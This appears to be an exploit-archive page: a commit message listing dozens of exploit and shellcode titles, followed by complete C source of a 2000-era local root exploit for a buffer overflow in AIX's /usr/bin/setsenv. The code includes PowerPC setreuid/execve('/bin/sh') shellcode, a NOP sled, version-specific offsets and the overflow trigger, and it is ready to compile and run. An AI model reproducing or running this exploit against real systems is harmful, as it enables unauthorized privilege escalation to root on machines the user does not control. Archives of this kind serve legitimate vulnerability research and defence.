
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
80 lines
No EOL
3.2 KiB
C
80 lines
No EOL
3.2 KiB
C
/*
|
|
source: https://www.securityfocus.com/bid/2032/info
|
|
|
|
AIX is a version of the UNIX Operating System distributed by IBM. A problem exists that could allow a user elevated priviledges.
|
|
|
|
The problem occurs in the setsenv binary. It has been reported that a buffer overflow exists in this binary which could allow a user to overwrite variables on the stack, including the return address. This makes it possible for a malicious user to execute arbitrary code, and potentially attain a UID of 0.
|
|
*/
|
|
|
|
/*## copyright LAST STAGE OF DELIRIUM sep 2000 poland *://lsd-pl.net/ #*/
|
|
/*## /usr/bin/setsenv #*/
|
|
|
|
/* note: to avoid potential system hang-up please, first obtain the exact */
|
|
/* AIX OS level with the use of the uname -a or oslevel commands */
|
|
|
|
#define ADRNUM 200
|
|
#define NOPNUM 16000
|
|
|
|
char setreuidcode[]=
|
|
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
|
|
"\x40\x82\xff\xfd" /* bnel <setreuidcode> */
|
|
"\x7e\xa8\x02\xa6" /* mflr r21 */
|
|
"\x3a\xb5\x01\x40" /* cal r21,0x140(r21) */
|
|
"\x88\x55\xfe\xe0" /* lbz r2,-288(r21) */
|
|
"\x7e\x83\xa3\x78" /* mr r3,r20 */
|
|
"\x3a\xd5\xfe\xe4" /* cal r22,-284(r21) */
|
|
"\x7e\xc8\x03\xa6" /* mtlr r22 */
|
|
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
|
|
"\x44\xff\xff\x02" /* svca */
|
|
"\xff\xff\xff\xff"
|
|
"\x38\x75\xff\x04" /* cal r3,-252(r21) */
|
|
"\x38\x95\xff\x0c" /* cal r4,-244(r21) */
|
|
"\x7e\x85\xa3\x78" /* mr r5,r20 */
|
|
"\x90\x75\xff\x0c" /* st r3,-244(r21) */
|
|
"\x92\x95\xff\x10" /* st r20,-240(r21) */
|
|
"\x88\x55\xfe\xe1" /* lbz r2,-287(r21) */
|
|
"\x9a\x95\xff\x0b" /* stb r20,-245(r21) */
|
|
"\x4b\xff\xff\xd8" /* bl <setreuidcode+32> */
|
|
"/bin/sh"
|
|
;
|
|
|
|
char nop[]="\x7f\xff\xfb\x78";
|
|
|
|
main(int argc,char **argv,char **e){
|
|
char buffer[20000],adr[4],*b,*envp[2];
|
|
int i;
|
|
|
|
printf("copyright LAST STAGE OF DELIRIUM sep 2000 poland //lsd-pl.net/\n");
|
|
printf("/usr/bin/setsenv for aix 4.1 4.2 4.3 4.3.x PowerPC/POWER\n\n");
|
|
|
|
if(argc<2){
|
|
printf("usage: %s 41|42|43|433\n",argv[0]);exit(-1);
|
|
}
|
|
|
|
switch(atoi(argv[1])){
|
|
case 41: memcpy(&setreuidcode[40],"\x68\x03",2); break;
|
|
case 42: memcpy(&setreuidcode[40],"\x71\x02",2); break;
|
|
case 43: memcpy(&setreuidcode[40],"\x82\x04",2); break;
|
|
case 433: memcpy(&setreuidcode[40],"\x92\x03",2); break;
|
|
default: exit(-1);
|
|
}
|
|
|
|
i=0; while(*e++) i+=strlen(*e)+1;
|
|
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
|
|
|
|
envp[0]=&buffer[1000];
|
|
envp[1]=0;
|
|
|
|
b=buffer;
|
|
strcpy(b,"lsd=");b+=4;
|
|
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
|
|
*b=0;
|
|
|
|
b=&buffer[1000];
|
|
sprintf(b,"xxx= ");b+=7;
|
|
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
|
|
for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
|
|
*b=0;
|
|
|
|
execle("/usr/bin/setsenv","lsd",buffer,0,envp);
|
|
} |